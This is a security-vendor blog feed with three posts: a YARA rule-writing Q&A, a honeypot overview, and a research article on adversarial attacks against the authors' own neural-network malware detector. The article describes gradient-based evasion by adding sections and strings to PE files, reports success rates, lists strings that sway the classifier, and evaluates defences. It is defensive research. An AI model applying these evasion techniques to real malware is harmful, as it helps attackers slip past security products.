Security technologies – Securelist

Applied YARA training Q&A

Costin Raiu, Vicente Diaz, Victor M. Alvarez — Fri, 03 Sep 2021 10:00:14 +0000

Introduction

On August 31, 2021 we ran a joint webinar between VirusTotal and Kaspersky, with a focus on YARA rules best practices and real world examples. If you didn’t have the chance to watch the webinar live, you can see it as a recording on Brighttalk: Applied YARA training.

During the webinar we received an overwhelming response and we would like to thank all the participants for sharing their thoughts, questions and ideas; most of all, we are happy to see so much interest and enthusiasm for YARA!

During the 90 minutes of the webinar we only had the chance to answer a fraction of the questions we received. We would still like to answer the remaining ones, since we thought a lot of them are quite relevant to real world situations, practices and could be useful to other security practitioners. Even better, for the more tricky questions we decided to ask for help from the creator of YARA itself, Victor Manuel Alvarez (aka Hector Manuel Velasquez) who will help answer them. If you have further questions, please feel free to send them to us in the comments section. We will be happy to answer them too!

Stay safe, stay secure and Happy hunting!

Costin, Vicente and Victor

Q&A:

RULE WRITING

Q: How difficult is it writing a YARA rule for obfuscated payloads?
Q: What file features normally you experts often look into when it comes to obfuscated files? How can YARA help?
Q: What would be your tip / best practices for writing rules to catch obfuscated binaries?

Vicente here. Obfuscated files are tricky, but YARA can still be useful. We can use all the metadata and file geometry for the detection. Also, depending where the obfuscation is, maybe we can also use some portions of the code for the detection — for instance if it only obfuscates strings with some custom method, maybe the code used for obfuscation can be useful.

Costin here. In general, it is a lot more difficult to write YARA rules for obfuscated payloads. Depending on the obfuscation method, one can still find some ways to detect them. For example, assuming a specific cryptor or packer was used, you can still write a rule for the packer (eg. UPX) or, rely on an unpacking engine to give you the plain code. Some platforms, such as VirusTotal, would automatically unpack known tools for you, which allows one to write simple YARA rules for the unpacked code. When the obfuscation is polymorphic, for instance, the code is expanded with dummy instructions and operands are split within several operations, once can try to use other file properties, such as metadata, entropy, import hashes or other data which stays constants across different generation. In short, there is no rule on how to write rules for obfuscated code, but in some cases, it is possible.

Q: Do hashes used for API hashing for example would be helpful for a YARA rule? Since this can change in a future campaign, i’m in doubt.

Costin here. Absolutely — API hashing can be super useful for detection of malware, especially when there are very few unique strings that can be used in the rule, or, when the malware is otherwise obfuscated. YARA actually provides a nice easy to use solution — the PE module implements the standard Mandiant import hash function as pe.imphash(). This can be used in a YARA rule condition such as:

Q: Are you trying rules against a set of malware before releasing it?

Costin here. Yes, extensive QA of a YARA rule is critical for us before releasing it publicly or to customers. For this purpose, we use several internal databases, of both malicious files and known clean code. To make sure the YARA rule detects more than just one sample, we try to run it against our entire malware collection, which is over five petabytes at the moment. Sometimes, when time is essential, we run it on a subset of the malware collection, such as specific PE files received during the last 12 months, or, say, script files. In many cases, testing a rule on clean files is even more important than testing it on malware! Based on our experience, we’ve seen countless instances of YARA rules that were published by security companies or even governmental agencies which produced false positives when used on a real system. To simplify testing of YARA rules, you can either use VirusTotal’s Retrohunt feature, or set up a test of your own collections using our open source KLARA project.

Q: Won’t typos also restrict the YARA rule to a particular sample or samples distributed under one campaign?

Vicente here. That could happen, but maybe the typos are difficult to replace. For example, sometimes typos are in the commands that the malware receives from the server, which would need a redeployment of server and client side malware from the attacker. In some other cases attackers get fully unaware of the typo, maybe because they are not familiar with the language and just use a weird expression that no native speaker would use, and can stay there forever. We can find these typos everywhere, including metadata, comments, etc.

Q: Where are good sources for large amounts of known good clean data?

Costin here. There are several public, free good sources of known good clean data. Some have suggested the NIST reference set, however, you can also build your own from things like a Windows installation, Linux install, Android/iOS dumps and the likes. It’s important to also have third party software, such as Chrome, Firefox or Adobe Reader. A lot of false positives produced by publicly available YARA rules occur on software such as the ones above!

Q: How useful are YARA Rule Generators like Florian Roth’s yarGen?

Vicente here. YARA rule generators are VERY useful, but we do not recommend using raw generated rules without an extra round of manual polishing. We believe it is more useful to use it for a first round to extract potentially relevant strings from a collection of samples we are analyzing, and from here use these results to help us build more refined rules.

Q: Is it better to use wide, wide ASCII, both, or none?

Costin here. Using wide, ASCII or both (or none) depends on a case by case basis. Depending on how a malware piece is compiled, the strings you see inside could be ASCII (single byte) or wide (double byte, Unicode). YARA allows you to easily search for UTF-16 strings through the wide modifier. By default, ASCII is used every time you assign a string to a variable, however, if you want to search both, you need to use “ASCII wide”. Adding “wide” to the ASCII strings you are searching for might find you additional stuff.

Q: If a rule generates false positives on a very specific sample, would you suppress a specific hash in the rule directly or rather improve the whole logic?

Vicente here. The answer is — “it depends”. If there is a very particular binary that produces a false positive in an otherwise solid rule, we can keep the rule as long as we know what we are doing — for example we use it for hunting privately, and just exclude that specific FP file by hash. In case this rule would be used externally or automatically, for instance in a production environment for detection, then better to avoid this false positive in the logic.

Q: Some programming languages have automatic formatters (like ‘Black’ in Python, or gofmt in Golang) — do you recommend something similar for YARA, to maintain good formatting across a team?

Víctor here. As far as I know such a tool doesn’t exist. There are some alternative parsers for YARA, which are able to read a YARA source file, build an abstract syntax tree (AST) from it, and regenerate the source code from the AST. But they have limitations that make them unsuitable for building a tool like gofmt (for example the comments are completely lost).

YARA INTERNALS

Q: Does YARA “digest” and optimize a ruleset for example user writes “i001” and “i001”

Víctor here. YARA doesn’t perform any optimization on the condition, they are evaluated exactly as they are written. No attempt is made to detect useless branches in the condition, if you write “X or Y or Z or true” YARA evaluates X, Y and Z, it is not smart enough to realize that the condition is always true. Also, if you use the same pattern/string in different rules they are treated as if they were different, YARA doesn’t realize that you are searching for the same string.

Q: Can YARA run on only files with macOS xattributes for example com.apple.metadata:kMDItemDownloadedDate, com.apple.quarantine?

Vicente here. At the moment, I’m not aware of any module able to interact with them.

Q: I have seen that hash is case sensitive .. i have to use lower case. Will this change in future?
Q: Hash looks like case sensitive. Can you confirm that?

Víctor here. The next version of YARA will include the icompare operator for case-insensitive string comparison. The == operator maintains its case-sensitive semantic when used for comparing strings, but with icompare you don’t need to worry about whether the values returned by the hash module are upper or lower case.

Q: Does YARA see filename in the file set?

Vicente here. At the moment, you cannot specify any condition about the filename in a rule, as YARA is designed just to check the content and structure of the file and the file name can easily change. Nevertheless, this option exists in case you use the VT YARA module, which is available to take advantage of file metadata for YARA rules running on VirusTotal. You can also use the -D option to define a variable in the rule that contains the filename.

Victor here. I would like to provide more context about this. The reason for not including a “filename” keyword in a similar way to “filesize” is because “filesize” makes sense in almost any context (except when scanning a process address space) as the data being scanned always have a size. However, “filename” makes sense when you are using the YARA command-line tool for scanning your hard drive, but it doesn’t make sense where YARA is scanning the data without knowing where the data comes from. However, due to the high number of times I’ve seen this question asked, I’m considering some intermediate solution, like allowing the command line tool to define a variable that automatically takes the name of the current file.

Q: Is it possible to use YARA to monitor strings in PDF documents? Or is it medium-dependent?

Vicente here. It is possible. However keep in mind that strings are not represented inside the file the same way they are displayed to a reader. It is important to check the content of the file itself with utilities such as “strings” or with any hex editor, and select which strings can be used for a YARA rule. But it will not necessarily work if you select strings based on how they appear in the PDF when displayed.

Q: Is YARA compatible with the ELK stack?

Vicente here. There are different available options, like plugins to incorporate events matching YARA rules into Elastic, for example.

EFFICIENCY

Q: Is uint16(0) faster than $magic at 0? (Where $magic is the hex value)

Vicente and Costin here. The $magic check should be considered obsolete and is hopefully not used anymore in any public rules. Please kindly use uint16(0) or the Magic module instead. This is because defining a string such as $mz=”MZ” will cause YARA to search for this short string and save all the matches in a file, no matter the offset, which greatly increases the resource overload. This slows down scanning and eats up more memory. In general, short strings should be avoided in YARA rules for this reason, or always followed by the “fullword” modifier.

Q: In your experience, is CPU or I/O the bigger constraints? Can YARA run at low-priority? Only on user idle restricted to time schedule? I am thinking about tunability like worldCommunity grid. Does YARA use sophisticated I/O scheduling?

Víctor here. That depends a lot on your rules. If you have a few high-performance rules the bottleneck will certainly be I/O, but it can change drastically if you have many rules or they are not very fast. YARA doesn’t do anything special with regards to I/O, it just uses memory-mapped files and relies on the operating system for I/O. Both in Windows and Linux, YARA tells the operating system that files are likely to be read sequentially, so that the OS can take that into account and read-ahead aggressively.

Q: Hello. Is the “nocase” option efficient? We can never know what case we can find in a malware file, and maybe the “nocase” option increases the search time and the used resources. How to determine if we need this option?

Víctor here. It depends on the string, but generally speaking “nocase” introduces a performance penalty and it should be avoided if possible. Many people use “nocase” and “wide” just in case. They are not really sure about it, but they use them because it doesn’t do any harm (or so they think). My advice is doing exactly the opposite, if you don’t have a clear reason for using those modifiers, don’t do it. If you know for sure, or have good reasons for believing that the string can appear in some arbitrary casing, use “nocase”, but avoid it if otherwise.

Q: My understanding is that the ‘filesize’ condition is evaluated AFTER all strings have been processed. If this is the case, then filesize cannot be used to make rules more efficient by eliminating samples based on filesize BEFORE strings are evaluated. Is my understanding correct? If so, do you know the reason why filesize is evaluated after strings?

Víctor here. That’s 100% correct. The reason for that behavior is that YARA is optimized for the case in which you have many rules. From the performance standpoint the best thing to do when you have a lot of rules is scanning the file in a single pass first, looking for all the strings from all the rules at once, and then evaluate all the conditions. Evaluating the conditions first, searching for each string individually as they are used in the condition does not scale well when you have thousands of rules. With a very high number of rules the odds are that you are going to need reading and scanning the file anyways, as at least one of your conditions won’t filter out the file because of its size.

USING YARA

Q: if you have a mature team, and a large set of rules that were developed over time — do you have any thoughts on how to go back and re-evaluate if rules are still good, or need to be updated (and how often, etc.) — or other ways to track metrics on each rule? (‘Hey, this one fired once, and it was a great find — this second one fires with every SCR, and needs some work’)

Vicente here. This is an excellent question. What would be important is to create a policy based on your needs and how you use these rules. Some of the rules can be valid for years while others can change very rapidly, and that depends both on the rule itself and on the threat they monitor. It is always good to have a baseline detection per rule (what it should be detecting) and find alternative methods to double-check these detected samples indeed belong to the family/actor you are monitoring. From this point, you need to work on keeping updating these rules, detection methods and detected samples triad regularly, polishing rules as needed and replacing them once they are not relevant anymore.

Q: Is there a way to centrally run YARA rules to all network workstations without depending upon other third party tools like Nessus or supported antivirus platforms?

Vicente here. There are different EDRs and utilities to do so. However this kind of practice tends to be overkill in most cases. We recommend carefully selecting what rules to run, what folders and adding further conditions to the rules in order to avoid scanning unnecessary files (you can play with conditions such as file format, size, timestamps, etc).

Q: We have tried YARA ourselves and there’s no doubt about the capabilities. What we want to understand is what is the correct way to leverage YARA? Shall we scan some workstations regularly with industry/region specific threat intelligence? Or a better approach could be to run periodic scans based on targeted hypothesis based threat hunting? Shall we only run it to investigate incidents?

Vicente here. This totally depends on your goals, as all the above are very usual use cases. In most of the cases, you want to regularly scan a small percentage of sensitive or suspicious files on a regular basis. The same with your rules, you want to maybe use the ones corresponding with active and relevant threats. In parallel, you will always have your collection active for hunting and ready for any IR/forensic if needed.

Q: Can we also search within memory with YARA?

Vicente here. It is possible. There are several EDRs and tools that allow you to do so. Also, it is always possible to use YARA against a memdump, for instance using Volatility. Last but not least, you can directly scan a running process, if you know it’s PID, by running “YARA rule.YARA PID”.

Q: Is it possible to utilize hash detection with YARA?

Vicente and Costin here. Yes, it is. You can use the “hash” external module and calculate different hashes for files or sections. Here’s an example of such a rule from Github Xprotect.YARA:

Q: What do you recommend for managing a large collection of YARA rules (deduping, updating versions, etc)?

Vicente here. We do not recommend any utility in particular for this, many researchers simply use GitHub. Our recommendation in terms of procedures would be always checking that rules detect what they are supposed to detect and checking against false positives, and to do this regularly. One utility you can use in this direction is YARA-CI. We also recommend having different collections for different purposes, for instance Incident Response, Forensic, Hunting, Mem-scanning, etc.

Q: How can we start using YARA for malicious email attachments?

Vicente here. There are different mail security appliances that allow you to do so. You can always check attachments separately.

Q: For memory dump, I was not able to scan directly by attaching it, rather I had to mount its file system (e.g. MemProcFS) before YARA can work. Am I correct?

Vicente here. Right. Another option is using the dedicated utility in Volatility to run YARA against memdumps.

VIRUSTOTAL

Q: Will VT allow us to scan older parts of the corpus with retrohunt?

Vicente here. At the moment, VirusTotal Retrohunt works on a 90 day back index that can be expanded to 1 year depending on your subscription.

Q: Can YARA rules be shared with the VT community, or these only can be shared from user to user?

Vicente here. We incorporate a number of repositories from the community as crowdsourced YARA rules, you can find a list of contributors here. If you would like to contribute, please contact us!

Q: Can we find strings inside pdf files on VirusTotal with YARA rules? We can see it working on other files types but not on pdf, we didn’t really see it working and could not find something about it on the VT YARA documentation.

Vicente here. As described in a previous question, nothing changes when using VirusTotal to find a string within a PDF than when using YARA in any other environment.

Q: What are ways of hunting with YARA beyond VirusTotal?

Vicente here. Hunting is a technique/art/discipline that can be done on any platform. Basically you just need a collection of data you can explore to find what you are looking for. Usually that would mean a collection of malware with as much data on top of it as possible. In VirusTotal we work hard to make it as convenient as possible.

MISC

Q: Also consider that you can tip off the threat actor that you have found their malware…

Vicente here. This is true. Many actors are interested in understanding how they are detected, which can become quite obvious when checking YARA rules publicly available. It is a cat and mouse game, but happily the fact that actors understand how they are being detected doesn’t mean they can avoid it in an easy or quick way.

Q: Can anyone explain why YARA was created with a unique schema (yet similar) compared to SQL? Do developers see YARA rules as a catch-all rule writing standard that will eventually become a standard for querying any data? I find YARA rules far easier to write/read than many formats, and it seems more modern, but the evolution is unclear.

Víctor here. The syntax was created with legibility in mind because YARA rules are intended to be created/consumed by humans. The idea was creating a language that looked more like a programming language than like SQL, in fact you can find reminiscences of C in YARA’s syntax. However, YARA doesn’t pretend to be a general purpose query language for usages outside the scope it was designed for. Any future enhancements in the syntax will be oriented towards improving expressiveness and legibility, but always within the boundaries of its current purpose.

Q: How do you communicate the importance and utility of incorporating threat hunting techniques (like writing YARA rules) to muggles?

Vicente here. Threat Hunting is one of the best techniques we have. We use it to defend ourselves from current attacks, by expanding our visibility and establishing monitoring on threats targeting us. It is also one of the most powerful weapons we have to detect unknown threat activity.

Q: Maybe I’m jumping ahead, please forgive me if I do; but how do commercial Anti-Virus companies use YARA to determine whether a file is being malicious? How do you deal with false-positives?

Vicente here. YARA is one of the methods or engines that AV companies might use to determine whether something is malicious. In essence it is not different from other methods, and depending how it is being used can lead to False Positives. As it usually happens, this has nothing to do with the tools used but with how solid the rules are, if they are being double-checked with any second method, if there is a reputation system in place, how good the heuristics are, etc.

That’s all for now!
Stay safe everyone and hope to see you at our next webinars!

Online resources:

Detecting unknown threats: a honeypot how-to

Kaspersky — Mon, 28 Jun 2021 11:15:03 +0000

Catching threats is tricky business, especially in today’s threat landscape. To tackle this problem, for many years сybersecurity researchers have been using honeypots – a well-known deception technique in the industry. Dan Demeter, Senior Security Researcher with Kaspersky’s Global Research and Analysis Team and head of Kaspersky’s honeypot project, explains what honeypots are, why they are recommended for dealing with external threats, and how you can set up your own simple SSH-honeypot. This post offers a condensed version of his presentation alongside the video, which you can view below.

What are honeypots?

A honeypot is a special piece of software that emulates a vulnerable device. Those devices can be from a wide variety of types, such as smart light bulbs, home security DVRs, fridges, microwaves, etc. Deployed publicly on the Internet, honeypots mimick real devices, and, in essence, function like traps for the attackers targeting such devices. Sometimes honeypots also allow defenders to attract and identify new, previously unknown attacks and exploits.

Who needs to set up honeypots? Why?

To protect an organization and its network, the IT security department usually deploys a variety of protection mechanisms, such as EDR, firewall rules or security policies. However, from our experience, these mechanisms might not be enough. Even before they shifted to remote work, organizations had used many vulnerable devices exposed to the Internet that they did not know about. With the shift to remote work, the number of remote stations has increased, and so has the number of exposed network devices, making corporate networks even more vulnerable. Honeypots help strengthening corporate defense system – being planted in key parts of the network they serve as decoys to register external attacks, and capture the threats that were used. This provides an opportunity to further analyze an attack against an organization and learn how to fend it off.

What is Kaspersky’s honeypot project and how can organizations participate?

Honeypot systems require high visibility: the higher – the better, as that helps to cover a wider attack surface. That’s why it is important to collaborate with ISPs, security service vendors or research groups on the Internet to detect new attacks. Kaspersky is continuously improves and strengthens its partnerships with various research groups and ISPs around the world to enhance detection capabilities. Kaspersky offers Honeypots-as-a-Service: we provide the entire infrastructure, our partners only needing to set up and deploy honeypot nodes in their networks. These are connected together and to our honeypot infrastructure. Kaspersky monitors them, analyzes, and aggregates the data, identifies the attacks, and offers its partners statistics (such as most common usernames and passwords used, attacker IPs, types of attacks, etc.), as well as any other artefacts that might be of interest to them. To join Kaspersky’s honeypot project, email to honeypots@kaspersky.com.

To learn how to set up an SSH-honeypot to deal with attackers who are seeking to bruteforce your logins and passwords, watch the full video with Dan Demeter, where he answers basic questions about honeypots.

How to confuse antimalware neural networks. Adversarial attacks and protection

Alexey Antonov, Alexey Kogtenkov — Wed, 23 Jun 2021 12:16:30 +0000

Introduction

Nowadays, cybersecurity companies implement a variety of methods to discover new, previously unknown malware files. Machine learning (ML) is a powerful and widely used approach for this task. At Kaspersky we have a number of complex ML models based on different file features, including models for static and dynamic detection, for processing sandbox logs and system events, etc. We implement different machine learning techniques, including deep neural networks, one of the most promising technologies that make it possible to work with large amounts of data, incorporate different types of features, and boast a high accuracy rate. But can we rely entirely on machine learning approaches in the battle with the bad guys? Or could powerful AI itself be vulnerable? Let’s do some research.

In this article we attempt to attack our product anti-malware neural network models and check existing defense methods.

Background

An adversarial attack is a method of making small modifications to the objects in such a way that the machine learning model begins to misclassify them. Neural networks (NN) are known to be vulnerable to such attacks. Research of adversarial methods historically started in the sphere of image recognition. It has been shown that minor changes in pictures, such as the addition of insignificant noise can cause remarkable changes in the predictions of the classifiers and even completely confuse ML models[i].

The addition of inconspicuous noise causes NN to classify the panda as a gibbon

Furthermore, the insertion of small patterns into the image can also force models to change their predictions in the wrong direction[ii].

Adding a small patch to the image makes NN classify the banana as a toaster

After this susceptibility to small data changes was highlighted in the image recognition of neural networks, similar techniques were demonstrated in other data domains. In particular, various types of attacks against malware detectors were proposed, and many of them were successful.

In the paper “Functionality-preserving black-box optimization of adversarial windows malware”[iii] the authors extracted data sequences from benign portable executable (PE) files and added them to malware files either at the end of the file (padding) or within newly created sections (section injection). These changes affected the scores of the targeted classifier while preserving file functionality by design. A collection of these malware files with inserted random benign file parts was formed. Using genetic algorithms (including mutations, cross-over and other types of transformations) and the malware classifier for predicting scores, the authors iteratively modified the collection of malware files, making them more and more difficult for the model to be classified correctly. This was done via objective function optimization, which contains two conflicting terms: the classification output on the manipulated PE file, and a penalty function that evaluates the number of injected bytes into the input data. Although the proposed attack was effective, it did not use state-of-the-art ML adversarial techniques and relied on public pre-trained models. Also, the authors measured an average effectiveness of the attack against VirusTotal anti-malware engines, so we don’t know for sure how effective it is against the cybersecurity industry’s leading solutions. Moreover, since most security products still use traditional methods of detection, it’s unclear how effective the attack was against the ML component of anti-malware solutions, or against other types of detectors.

Another study, “Optimization-guided binary diversification to mislead neural networks for malware detection”[iv], proposed a method for functionality-preserving assembler operand changes in functions, and adversarial attacks based on it. The algorithm randomly selects a function and transformation type and tries to apply selected changes. The attempted transformation is applied only if the targeted NN classifier becomes more likely to misclassify the binary file. Again, this attack lacks ML methods for adversarial modification, and it has not been tested on specific anti-malware products.

Some papers proposed gradient-driven adversarial methods that use knowledge about model structure and features for malicious file modification[v]. This approach provides more opportunities for file modifications and results in better effectiveness. Although the authors conducted experiments in order to measure the impact of such attacks against specific malware detectors (including public models), they don’t work with product anti-malware classifiers.

For a more detailed overview of the various adversarial attacks on malware classifiers, see our whitepaper and “A survey on practical adversarial examples for malware classifiers“.

Our goal

Since Kaspersky anti-malware solutions, among other techniques, rely on machine learning models, we’re extremely interested in investigating how vulnerable our ML models are to adversarial attacks. Three attack scenarios can be considered:

– White-box attack. In this scenario, all information about a model is available. Armed with this information, attackers try to convert malware files (detected by the model) to adversarial samples with identical functionality but misclassified as benign. In real life this attack is possible when the ML detector is a part of the client application and can be retrieved by code reversing. In particular, researchers at Skylight reported such a scenario for the Cylance antivirus product.

– Gray-box attack. Complex ML models usually require a significant amount of both computational and memory resources. Therefore, the ML classifiers may be cloud-based and deployed on the security company servers. In this case, the client applications merely compute and send file features to these servers. The cloud-based malware classifier responds with the predictions for given features. The attackers have no access to the model, but they still have knowledge about feature construction, and can get labels for any file by scanning it with the security product.

– Black-box attack. In this case, feature computation and model prediction are performed on the cybersecurity company’s side. The client applications just send raw files, or the security company collects files in another way. Therefore, no information about feature processing is available. There are strict legal restrictions for sending information from the user machine. This approach also involves traffic limitation. This means the malware detection process usually can’t be performed for all user files on the go. Therefore, an attack on a black-box system is still the most difficult.

Consequently, we will focus on the first two attack scenarios and investigate their effectiveness against our product model.

Features and malware classification neural network

We built a simple but well-functioning neural network similar to our product model for the task of malware detection. The model is based on static analysis of executable files (PE files).

Malware classification neural network

The neural network model works with the following types of features:

PE Header features – features extracted from PE header, including physical and virtual file size, overlay size, executable characteristics, system type, number of imported and exported functions, etc.
Section features – the number of sections, physical and virtual size of sections, section c
Section statistics – various statistics describing raw section data: entropy, byte histograms of different section parts, etc.
File strings – strings parsed from raw file using special utility. Extracted strings packed into bloom filter

Let’s take a brief look at the bloom filter structure.

Scheme of packing strings into bloom filter structure. Bits related to strings are set to 1

The bloom filter is a bit vector. For each k string n predefined hash functions are calculated. The value of the hash functions determines the position of a bit to be set to 1 in the bloom filter vector. Note that different strings can be mapped to the same bit. In this case the bit remains in the set position (equal to 1). This way we can pack all file strings into a vector of a fixed size.

We trained the aforementioned neural network on approximately 300 million files – half of them benign, the other half malware. The classification quality of this network is displayed in the ROC curve. The X-axis shows the false positive rate (FPR) in logarithmic scale, while the Y-axis corresponds to the true positive rate (TPR) – the detection rate for all the malware files.

ROC curve for trained malware detector

In our company, we focus on techniques and models with very low false positive rates. So, we set a threshold for a 10^-5 false positive rate (we rate 1 false positive as 100 000 true detections). Using this threshold, we detected approximately 60% of the malware samples from our test collection.

Adversarial attack algorithm

To attack the neural network, we use the gradient method described in “Practical black-box attacks against machine learning“. For a malware file we want to change the score of the classifier to avoid detection. To do so, we calculate the gradient for the final NN score, back-propagate it through all the NN layers to the file features. The main difficulty of creating an adversarial PE is saving the functionality of the original file. To achieve this, we define a simple strategy. During the adversarial attack we only add new sections, while existing sections remain intact. In most cases these modifications don’t affect the file execution process.

We also have some restrictions for features in the new sections:

Different size-defining features (related to file/section size, etc.) should be in the range from 0 to some not very large value.
Byte entropy and byte histograms should be consistent. For example, the values in a histogram for a buffer with the size S should give the value S when combined.
We can add bits to the bloom filter, but can’t remove them (it is simple to add new strings to the file, but difficult to remove).

To satisfy these restrictions we use an algorithm similar to the one described in “Deceiving end-to-end deep learning malware detectors using adversarial examples” but with some modifications (described below). Specifically, we move the “fix_restriction” step into the “while” loop and expanded the restrictions.

Here ^dF(x,y)⁄_dx is the gradient of the model output by features, fix_restrictions projects features to the aforementioned permitted value area, is the step size.

The adversarial-generating loop contains two steps:

We calculate gradient of model score by features, and add to the feature vector x in the direction of the gradient for all non-bloom features.
Update the feature vector x to meet existing file restrictions: for example, put integer file features into the required interval, round them.

For bloom filter features we just set up one bit corresponding to the largest gradient. Actually, we should also find the string for this bit and set up other bits corresponding to it. However, in practice, this level of precision is not necessary and has almost no effect on the process of generating adversarial samples. For simplicity, we will skip the addition of other corresponding string bits in further experiments.

White-box attack

In this section we investigate the effectiveness of the algorithm for the white-box approach. As mentioned above, this scenario assumes the availability of all information about the model structure, as is the case when the detector is deployed on the client side.

By following the algorithm of adversarial PE generation, we managed to confuse our classification model for about 89% of the malicious files.

Removed detection rate. X-axis shows the number of steps in algorithm 1; Y-axis shows the percentage of adversarial malicious files that went undetected by the NN classifier (while their original versions were detected).

Thus, it is easy to change files in order to avoid detection by our model. Now, let us take a closer look at the details of the attack.

To understand the vulnerabilities of our NN we implement the adversarial algorithm for different feature types separately. First, we tried to change string features only (bloom filter). Doing so confuses the NN for 80% of the malware files.

Removed detection rate for string changing only

We also explore which bits of the bloom filter are often set to 1 by the adversarial algorithm.

The histogram of bits, added by the adversarial algorithm to the bloom filter. Y-axis corresponds to the ratio of files that the current bit is added to. A higher rate means that bit is important for decreasing the model score

The histogram shows that some bits of the bloom filter are more important for our classifier, and setting them to 1 often leads to a decrease in the score.

To investigate the nature of such important bits we reversed the popular bits back to the string and obtained a list of strings likely to change the NN score from malware to benign:

Pooled mscoree.dll CWnd MessageBoxA SSLv3_method assembly manifestVersion="1.0"
xmlns="urn… SearchPathA AVbad_array_new_length@std Invalid color format in %s file
SHGetMalloc Setup is preparing to install [name] on your computer
e:TScrollBarStyle{ssRegular,ssFlat,ssHotTrack SetRTL VarFileInfo cEVariantOutOfMemoryError
vbaLateIdSt VERSION.dll GetExitCodeProcess mUnRegisterChanges ebcdic-Latin9--euro
GetPrivateProfileStringA XPTPSW cEObserverException LoadStringA fFMargins SetBkMode
comctl32.dll fPopupMenu1 cTEnumerator
We also tried to attack the model to force it to misclassify benign files as malware (inverse problem). In this case, we obtained the following list:
mStartTls Toolhelp32ReadProcessMemory mUnRegisterChanges ServiceMain arLowerW
fFTimerMode TDWebBrowserEvents2DownloadCompleteEvent CryptStringToBinaryA
VS_VERSION_INFO fFUpdateCount VirtualAllocEx Free WSACreateEvent File I/O error %d
VirtualProtect cTContainedAction latex VirtualAlloc fFMargins set_CancelButton FreeConsole
ntdll.dll mHashStringAsHex mGetMaskBitmap mCheckForGracefulDisconnect fFClientHeight
mAddMulticastMembership remove_Tick ShellExecuteA GetCurrentDirectory get_Language
fFAutoFocus AttributeUsageAttribute ImageList_SetIconSize URLDownloadToFileA CopyFileA UPX1
Loader

These sets of “good” and “bad” strings look consistent and plausible. For instance, the strings ‘MessageBoxA’ and ‘fPopupMenu1’ are actually often used in benign files. And vice versa, strings like ‘Toolhelp32ReadProcessMemory’, ‘CryptStringToBinaryA’, ‘URLDownloadToFileA’ and ‘ShellExecuteA’ look suspicious.
We also attempted to confuse our model using only binary sections statistics.

Removed detection rate for section added, without bloom features. X-axis corresponds to the number of added sections, Y-axis to the percentage of malware files that become “clean” during adversarial attacks
The graph shows that it is possible to remove detection for about 73% of malware files. The best result is achieved by adding 7 sections.
At this point, the question of a “universal section” arises. That is, a section that leads to the incorrect classification and detection removal of many different files when added to them. Taking this naïve approach, we simply calculated mean statistics for all sections received during the adversarial algorithm and created one “mean” section. Unfortunately, adding this section to the malware files removes just 17% of detections.

Byte histogram of “mean” section: for its beginning and ending. X-axis corresponds to the byte value; Y-axis to the number of bytes with this value in the section part
So, the idea of one universal section failed. Therefore, we tried to divide the constructed adversarial section into compact groups (using the l2 metric).

Adversarial sections dendrogram. Y-axis shows the Euclidian distance between sections statistics
Separating the adversarial sections to clusters, we calculated a “mean” section for each of them. However, the detection prevention rate did not increase rapidly. As a result, in practice, only 25-30% of detection cases can be removed by adding such “universal mean sections”.

The dependence of the removed detection share on the number of clusters for “mean” sections computation
The experiments showed that we do not have a “universal” section for making a file look benign for our current version of NN classifier.
Gray-box attack
All previous attacks were made with the assumption that we already have access to the neural network and its weights. In real life, this is not always the case.
In this section we consider a scenario where the ML model is deployed in the cloud (on the security company’s servers), but features are computed and then sent to the cloud from the user’s machine. This is a typical scenario for models in the cybersecurity industry because sending user files to the company side is difficult (due to legal restrictions and traffic limitations), while specifically extracted features are small enough for forwarding. It means that attackers have access to the mechanisms of feature extraction. They can also scan any files using the anti-malware product.
We created a number of new models with different architectures. To be precise, we changed the number of fully connected layers and their sizes in comparison with the original model. We also collected a large collection of malware and benign files that were not in the original training set. Then we extracted features from the new collection – this can be done by reversing the code of the anti-malware application. Then we labeled the collection in two different ways: by the full anti-malware scan and using just the original model verdicts. To clarify the difference, with the selected threshold the original model detects about 60% of malware files compared to the full anti-malware stack. These models were trained on the new dataset. After that the adversarial attack described in previous sections was implemented for proxy models. The resulting adversarial samples built for the proxy model were tested on the original one. Despite the fact that the architectures and training datasets of the original and proxy models were different, it turned out that attacks on the proxy model can produce adversarial samples for the original model. Surprisingly, attacking the proxy model could sometimes lead to better attack results.

Gray-box attack results compared to white-box attack. Y-axis corresponds to the percentage of malware files with removed detections of the original model. The effectiveness of the gray-box attack in this case is better than that of the white-box attack.
The experiment shows that a gray-box attack can achieve similar results to the white-box approach. The only difference is that more gradient steps are needed.
Attack transferability
We don’t have access to the machine learning models of other security companies, but we do have reports[vi] of gray-box and white-box adversarial attacks being successful against publicly available models. There are also research papers[vii] about the transferability of adversarial attacks in other domains. Therefore, we presume that product ML detectors of other companies are also vulnerable to the described attack. Note that neural networks are not the only vulnerable machine learning type of model. For example, another popular machine learning algorithm, gradient busting, is also reported[viii] to have been subjected to effective adversarial attacks.
Adversarial attack protection
As part of our study, we examined several proposed algorithms for protecting models from adversarial attacks. In this section, we report some of the results of their impact on model protection.
The first approach was described in “Distillation as a defense to adversarial perturbations against deep neural networks“. The authors propose to train the new “distilled” model based on the scores of the first model. They show that for some tasks and datasets this method reduces the effectiveness of gradient-based adversarial attacks. Unfortunately, the idea does not guarantee successful model protection, and in our case, when we trained the model according to the proposed approach, it still turned out to be easily confused by the adversarial algorithm.
We also tried to add noise to data:

For continuous features we calculated mean and standard deviation values. We added a random number of sections to each file during model training. Then the generated sections parameters were taken from a Gaussian distribution with parameters equal to the aforementioned mean and deviation values.
For the bloom filter structure, we also added a 5% chance of setting each bit to 1.

The idea behind this method is to try to expand the set of potential file sections, making the network more stable and resistant to attacks that add sections to the end of a file. However, this method was not effective either.
We also tried the protection approach described in “Detecting adversarial samples from artifacts“. In many cases, neural network layers contain a dropout mechanism. A dropout is a layer that randomly replaces features from a previous layer with zeros. The idea of the paper is to enable a dropout in the inference stage (while it is usually disabled because the dropout layer mechanism produces a level of randomness and noise in predictions for the same objects), and calculate the score multiple times for each file. Enabling dropout layers leads to slightly different scores for each run, so we get a score distribution. These distributions, according to the authors, have standard deviation values for adversarial samples that are higher than for usual samples. We tried this approach, computing standard deviations of scores for adversarial malware and original malware files. Remarkably, the standard deviations of the adversarial scores appeared to be significantly higher than the deviations of the initial file scores.

Standard deviation distribution for adversarial and initial sample model scores
With this difference we can, for example, detect 50% of adversarial samples with initial sample misclassification of around 10%, with a threshold.

X-axis shows the share of original samples detected as adversarial; Y-axis shows the share of detected adversarial samples
